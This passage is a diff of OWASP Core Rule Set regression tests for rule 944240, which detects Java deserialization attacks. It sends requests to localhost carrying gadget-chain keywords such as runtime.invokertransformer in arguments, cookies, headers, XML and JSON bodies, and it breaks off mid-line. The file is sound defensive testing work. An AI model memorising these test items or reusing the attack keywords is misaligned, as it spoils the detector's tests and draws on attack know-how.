test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 39 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 40 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + 
- test_id: 41 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 42 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log: + expect_ids: [944240] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=value" + output: + log: + expect_ids: [944240] + - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": 
\"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 59 desc: "Cookie name includes keyword 
